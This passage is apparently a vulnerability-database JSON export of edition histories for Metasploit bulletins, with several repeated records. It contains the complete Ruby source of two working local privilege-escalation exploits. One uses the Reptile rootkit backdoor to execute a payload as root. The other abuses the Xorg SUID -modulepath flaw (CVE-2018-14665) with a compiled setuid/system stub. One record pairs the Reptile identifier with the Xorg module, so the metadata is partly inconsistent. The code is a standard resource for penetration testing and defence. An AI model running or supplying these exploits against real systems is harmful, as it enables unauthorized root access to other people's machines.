CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-28T07:46:31", "differentElements": ["sourceData"], "edition": 59}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-02T19:43:29", "history": [], "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:3E5624ED69974C619F437FCC88905C11"]}, {"type": "wired", "idList": ["WIRED:2BED81AA9E3EA719BAE7DC3636AB5F22"]}, {"type": "cve", "idList": ["CVE-2020-9540"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892131"]}, {"type": "exploitdb", "idList": ["EDB-ID:48154", "EDB-ID:48152", "EDB-ID:48153", "EDB-ID:48159", "EDB-ID:48160", "EDB-ID:48155", "EDB-ID:48149", "EDB-ID:48158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156588", "PACKETSTORM:156589", "PACKETSTORM:156584", "PACKETSTORM:156583", "PACKETSTORM:156593", "PACKETSTORM:156591"]}, {"type": "ubuntu", "idList": ["USN-4294-1"]}], "modified": "2020-03-02T19:43:29"}, "score": {"value": 5.9, "vector": "NONE", "modified": "2020-03-02T19:43:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-02T19:43:29", "differentElements": ["sourceData"], "edition": 60}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-02T21:53:39", "history": [], "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:EABA151827AA14E6292386F02B5ED8A1", "THREATPOST:3E5624ED69974C619F437FCC88905C11"]}, {"type": "wired", "idList": ["WIRED:2BED81AA9E3EA719BAE7DC3636AB5F22"]}, {"type": "cve", "idList": ["CVE-2020-9540"]}, {"type": "exploitdb", "idList": ["EDB-ID:48152", "EDB-ID:48154", "EDB-ID:48160", "EDB-ID:48153", "EDB-ID:48159", "EDB-ID:48155", "EDB-ID:48149", "EDB-ID:48158"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892131"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156588", "PACKETSTORM:156584", "PACKETSTORM:156589", "PACKETSTORM:156593", "PACKETSTORM:156591"]}, {"type": "ubuntu", "idList": ["USN-4294-1"]}], "modified": "2020-03-02T21:53:39"}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-03-02T21:53:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-02T21:53:39", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 61}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "744b777f537b3e8814f334e52dc47ede", "type": "metasploit", "bulletinFamily": "exploit", "title": "Xorg X11 Server SUID modulepath Privilege Escalation", "description": "This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running. On successful exploitation artifacts will be created consistant with starting Xorg.\n", "published": "2018-11-25T21:54:37", "modified": "2019-10-22T14:31:43", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665", "https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html"], "cvelist": ["CVE-2018-14665"], "lastseen": "2020-03-03T05:39:21", "history": [], "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-14665"]}, {"type": "f5", "idList": ["F5:K03073656"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704328", "OPENVAS:1361412562310843800", "OPENVAS:1361412562311220192123", "OPENVAS:1361412562310852126", "OPENVAS:1361412562310876007", "OPENVAS:1361412562310882986", "OPENVAS:1361412562310875244", "OPENVAS:1361412562311220192553", "OPENVAS:1361412562311220201062", "OPENVAS:1361412562311220192421"]}, {"type": "threatpost", "idList": ["THREATPOST:520C7CCDFE034FB0F8AFF7B86FD555B2"]}, {"type": "exploitdb", "idList": ["EDB-ID:45697", "EDB-ID:45938", "EDB-ID:47701", "EDB-ID:45908", "EDB-ID:45832", "EDB-ID:45922", "EDB-ID:45742", "EDB-ID:46142"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3800-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-31731", "1337DAY-ID-31593", "1337DAY-ID-31674", "1337DAY-ID-33404", "1337DAY-ID-31466", "1337DAY-ID-31947", "1337DAY-ID-31437", "1337DAY-ID-31436", "1337DAY-ID-33531"]}, {"type": "nessus", "idList": ["NEWSTART_CGSL_NS-SA-2019-0045_XORG-X11-SERVER.NASL", "FEDORA_2018-839720583A.NASL", "AIX_IJ11549.NASL", "REDHAT-RHSA-2018-3410.NASL", "ORACLELINUX_ELSA-2018-3410.NASL", "OPENSUSE-2019-915.NASL", "UBUNTU_USN-3802-1.NASL", "OPENSUSE-2018-1420.NASL", "SL_20181031_XORG_X11_SERVER_ON_SL7_X.NASL", "EULEROS_SA-2019-2553.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155276", "PACKETSTORM:150295", "PACKETSTORM:149958", "PACKETSTORM:150620", "PACKETSTORM:151136", "PACKETSTORM:150042", "PACKETSTORM:150450", "PACKETSTORM:149957", "PACKETSTORM:154942", "PACKETSTORM:150554"]}, {"type": "aix", "idList": ["XORG_ADVISORY3.ASC"]}, {"type": "centos", "idList": ["CESA-2018:3410"]}, {"type": "redhat", "idList": ["RHSA-2018:3410"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/AIX/LOCAL/XORG_X11_SERVER", "MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER", "MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER_MODULEPATH"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4328-1:FB5A7"]}, {"type": "ubuntu", "idList": ["USN-3802-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-3410", "ELSA-2019-2079"]}, {"type": "avleonov", "idList": ["AVLEONOV:1FF4C326FCF56EF1AA19C766216E191C"]}, {"type": "gentoo", "idList": ["GLSA-201810-09"]}, {"type": "thn", "idList": ["THN:8589C696FD99566AD522DE3118ECE8B9"]}], "modified": "2020-03-03T05:39:21"}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-03-03T05:39:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Kernel\n include Msf::Post::Linux::System\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with CentOS 7 (1708).\n CentOS default install will require console auth for the users session.\n Xorg must have SUID permissions and may not start if running.\n\n On successful exploitation artifacts will be created consistant\n with starting Xorg.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Narendra Shinde', # Discovery and exploit\n 'Aaron Ringo', # Metasploit module\n ],\n 'DisclosureDate' => 'Oct 25 2018',\n 'References' =>\n [\n [ 'CVE', '2018-14665' ],\n [ 'BID', '105741' ],\n [ 'EDB', '45697' ],\n [ 'EDB', '45742' ],\n [ 'EDB', '45832' ],\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]\n ],\n 'Platform' => %w[linux unix solaris],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => %w[shell meterpreter],\n 'Targets' =>\n [\n ['Linux x64', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64 } ],\n ['Linux x86', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86 } ],\n ['Solaris x86', {\n 'Platform' => [ 'solaris', 'unix' ],\n 'Arch' => ARCH_SPARC } ],\n ['Solaris x64', {\n 'Platform' => [ 'solaris', 'unix' ],\n 'Arch' => ARCH_SPARC } ],\n ],\n 'DefaultTarget' => 0))\n\n register_advanced_options(\n [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),\n OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])\n ]\n )\n end\n\n\n def check\n # linux checks\n uname = cmd_exec \"uname\"\n if uname =~ /linux/i\n vprint_status \"Running additional check for Linux\"\n if datastore['ConsoleLock']\n user = cmd_exec \"id -un\"\n unless exist? \"/var/run/console/#{user}\"\n vprint_error \"No console lock for #{user}\"\n return CheckCode::Safe\n end\n vprint_good \"Console lock for #{user}\"\n end\n end\n\n # suid program check\n xorg_path = cmd_exec \"command -v Xorg\"\n unless xorg_path.include?(\"Xorg\")\n vprint_error \"Could not find Xorg executable\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg path found at #{xorg_path}\"\n unless setuid? xorg_path\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\n\n x_version = cmd_exec \"Xorg -version\"\n if x_version.include?(\"Release Date\")\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\n vprint_error \"Xorg version #{v} not supported\"\n return CheckCode::Safe\n end\n elsif x_version.include?(\"Fatal server error\")\n vprint_error \"User probably does not have console auth\"\n vprint_error \"Below is Xorg -version output\"\n vprint_error x_version\n return CheckCode::Safe\n else\n vprint_warning \"Could not parse Xorg -version output\"\n return CheckCode::Appears\n end\n vprint_good \"Xorg version #{v} is vulnerable\"\n\n # process check for /X\n proc_list = cmd_exec \"ps ax\"\n if proc_list.include?('/X ')\n vprint_warning('Xorg in process list')\n return CheckCode::Appears\n end\n vprint_good('Xorg does not appear to be running')\n return CheckCode::Vulnerable\n end\n\n def check_arch_and_compile(path, data)\n cpu = ''\n if target['Arch'] == ARCH_X86\n cpu = Metasm::Ia32.new\n compile_with_metasm(cpu, path, data)\n elsif target['Arch'] == ARCH_SPARC\n compile_with_gcc(path, data)\n else\n cpu = Metasm::X86_64.new\n compile_with_metasm(cpu, path, data)\n end\n end\n\n def compile_with_metasm(cpu, path, data)\n shared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib)\n write_file(path, shared_obj)\n register_file_for_cleanup path\n\n chmod path\n rescue\n print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')\n compile_with_gcc(path, data)\n end\n\n def compile_with_gcc(path, data)\n unless has_gcc?\n fail_with Failure::BadConfig, 'gcc is not installed'\n end\n vprint_good 'gcc is installed'\n\n src_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c\"\n write_file(src_path, data)\n\n gcc_cmd = \"gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n output = cmd_exec gcc_cmd\n register_file_for_cleanup src_path\n register_file_for_cleanup path\n\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{src_path} failed to compile\"\n end\n\n chmod path\n end\n\n def exploit\n check_status = check\n if check_status == CheckCode::Appears\n print_warning 'Could not get version or Xorg process possibly running, may fail'\n elsif check_status == CheckCode::Safe\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'This session already has root privileges'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n print_good 'Passed all initial checks for exploit'\n\n modulepath = datastore['WritableDir']\n sofile = \"#{modulepath}/#{datastore['sofile']}\"\n pscript = \"#{modulepath}/.session-#{rand_text_alphanumeric 5..10}\"\n xdisplay = datastore['Xdisplay']\n\n stub = %Q^\nextern int setuid(int);\nextern int setgid(int);\nextern int system(const char *__s);\n\nvoid _init(void) __attribute__((constructor));\n\nvoid __attribute__((constructor)) _init() {\nsetgid(0);\nsetuid(0);\nsystem(\"#{pscript} &\");\n }\n ^\n print_status 'Writing launcher and compiling'\n check_arch_and_compile(sofile, stub)\n\n # Uploading\n print_status 'Uploading your payload, this could take a while'\n if payload.arch.first == 'cmd'\n write_file(pscript, payload.encoded)\n else\n write_file(pscript, generate_payload_exe)\n end\n chmod pscript\n register_file_for_cleanup pscript\n\n\n # Actual exploit with cron overwrite\n print_status 'Exploiting'\n #Xorg -logfile derp -modulepath ',/tmp' :1\n xorg_cmd = \"Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null\"\n cmd_exec xorg_cmd\n Rex.sleep 7\n cmd_exec \"pkill Xorg\"\n Rex.sleep 1\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-03T05:39:21", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 62}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-03T09:48:20", "history": [], "viewCount": 32, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0653"]}, {"type": "exploitdb", "idList": ["EDB-ID:48164", "EDB-ID:48154", "EDB-ID:48152", "EDB-ID:48159", "EDB-ID:48160", "EDB-ID:48153", "EDB-ID:48158"]}, {"type": "threatpost", "idList": ["THREATPOST:EABA151827AA14E6292386F02B5ED8A1", "THREATPOST:3E5624ED69974C619F437FCC88905C11"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2114-1:93D37"]}, {"type": "wired", "idList": ["WIRED:2BED81AA9E3EA719BAE7DC3636AB5F22"]}, {"type": "cve", "idList": ["CVE-2020-9540"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892131"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156588", "PACKETSTORM:156584", "PACKETSTORM:156589", "PACKETSTORM:156593"]}, {"type": "ubuntu", "idList": ["USN-4294-1"]}], "modified": "2020-03-03T09:48:20"}, "score": {"value": 6.6, "vector": "NONE", "modified": "2020-03-03T09:48:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-03T09:48:20", "differentElements": ["sourceData"], "edition": 63}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-05T03:53:16", "history": [], "viewCount": 32, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0302-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-34051", "1337DAY-ID-34048", "1337DAY-ID-34049"]}, {"type": "kitploit", "idList": ["KITPLOIT:6985886714952914143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0E0101791A56CBA665BB3F458CFE61AE"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2132-1:4B170"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892132"]}, {"type": "cert", "idList": ["VU:782301"]}, {"type": "thn", "idList": ["THN:03EECD650DB1FD1F15F27658CC11221F"]}, {"type": "threatpost", "idList": ["THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF"]}, {"type": "redhat", "idList": ["RHSA-2020:0669", "RHSA-2020:0666", "RHSA-2020:0664", "RHSA-2020:0661", "RHSA-2020:0653"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:DEC259D05B86EDA06F26D8E2A8DB3912"]}, {"type": "cve", "idList": ["CVE-2019-19792", "CVE-2020-4197"]}], "modified": "2020-03-05T03:53:16"}, "score": {"value": 5.3, "vector": "NONE", "modified": "2020-03-05T03:53:16"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-05T03:53:16", "differentElements": ["sourceData"], "edition": 64}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-05T05:57:20", "history": [], "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0302-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-34051", "1337DAY-ID-34048", "1337DAY-ID-34049"]}, {"type": "kitploit", "idList": ["KITPLOIT:6985886714952914143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0E0101791A56CBA665BB3F458CFE61AE"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2132-1:4B170"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892132"]}, {"type": "cert", "idList": ["VU:782301"]}, {"type": "packetstorm", "idList": 